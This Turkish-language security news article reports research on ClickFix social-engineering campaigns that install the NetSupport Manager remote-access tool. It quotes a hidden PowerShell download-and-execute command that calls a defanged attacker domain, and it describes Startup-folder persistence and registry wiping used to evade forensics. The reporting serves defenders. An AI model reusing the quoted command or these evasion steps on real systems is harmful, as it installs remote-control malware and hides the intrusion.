Siber suçlular, sistemleri ele geçirmek için taktiklerini geliştirmeye devam ediyor; son kampanyalar, geleneksel sahte güncelleme yöntemlerinden daha karmaşık sosyal mühendislik yaklaşımlarına önemli bir geçiş olduğunu gösteriyor.
2025 yılı boyunca tehdit aktörleri, yetkisiz sistem erişimi ve kontrolü isteyen kötü niyetli aktörler için cazip hale gelen meşru bir uzaktan yönetim aracı olan NetSupport Manager’ı dağıtmak için birincil dağıtım mekanizması olarak ClickFix tekniğini giderek daha fazla benimsedi.
Saldırı modeli, kurbanların kendilerini Windows Çalıştırma İstemi aracılığıyla kötü amaçlı komutlar yürütmeleri için kandırmak üzere tasarlanmış aldatıcı ClickFix sayfalarıyla karşılaştığı sosyal mühendislikle başlıyor.
Bu komutlar yürütüldükten sonra, çok aşamalı bir enfeksiyon sürecini tetikler ve sonuçta NetSupport’un güvenliği ihlal edilmiş sisteme yüklenmesiyle sonuçlanır.
eSentire Tehdit Müdahale Birimi analistleri, üç farklı tehdit grubunun çabalarını bu özel saldırı metodolojisi etrafında koordine ettiğini tespit etti; bu da siber suç ortamında bu dağıtım vektörüne doğru daha geniş bir değişime işaret ediyor.
eSentire Tehdit Müdahale Birimi araştırmacıları, kötü amaçlı yazılımın bulaşma mekanizmasının karmaşık operasyonel güvenlik önlemlerini ortaya çıkardığını belirtti.
Bu kampanyayı özellikle endişe verici kılan şey, tehdit aktörlerinin, çeşitli kurban ortamlarında tespit edilmeyi azaltmak ve başarı oranlarını en üst düzeye çıkarmak için dağıtım altyapılarını nasıl kolaylaştırdıklarıdır.
PowerShell Tabanlı Kalıcılık ve Yürütme Çerçevesi
Enfeksiyon zinciri büyük ölçüde çok aşamalı kodlama ve gizleme tekniklerini kullanan PowerShell tabanlı yükleyicilere dayanıyor.
.webp)
İlk aşama yükleyici, saldırgan tarafından kontrol edilen sunuculardan base64 kodlu bir JSON blobunu aşağıdaki gibi komutlarla indirir: –
PowerShell.exe -w h -nop -ep Bypass -c "$S='hxxps://riverlino[.]com/U.GRE';$j=$env:TEMP+'\1.ps1';(New-Object Net.WebClient).DownloadFile($S,$j);powershell -f $j"Yükleyici yürütüldükten sonra JSON yapılandırmasının kodunu çözer ve her bir yük bileşenini çıkarır.
Kötü amaçlı yazılım, gizli sistem dizinleri oluşturur ve base64 kodu çözülmüş dosyaları diske yazarak %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup içindeki başlangıç klasörü kısayolları aracılığıyla kalıcılık sağlar.
Son varyantlar, adli soruşturmaları karmaşık hale getirmek için Run Prompt yürütme kanıtlarını kasıtlı olarak silen RunMRU kayıt defteri silme tekniklerini içerecek şekilde geliştirildi.
İkincil yükleyiciler, msiexec aracılığıyla yürütülen MSI yükleyici paketlerini kullanır ve yürütmeden önce karakter noktası çıkarma işlemine tabi tutulan ek base64 kodlu PowerShell komutları ekler.
Bu katmanlı yaklaşım, tehdit aktörlerinin esnek komut yürütme yeteneklerini korurken statik algılama mekanizmalarından kaçınma konusundaki kararlılığını göstermektedir.
Şüpheli ClickFix istemleriyle veya beklenmedik NetSupport kurulumlarıyla karşılaşan kuruluşlar, etkilenen sistemleri derhal izole etmeli ve kapsamlı adli analiz gerçekleştirmelidir.
Ağ savunucuları, uygulama beyaz listeye alma kontrollerini uygulamalı ve şüpheli PowerShell etkinliğini, özellikle de base64 kod çözme ve standart dışı yürütme ilkelerini içeren komutları izlemelidir.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.
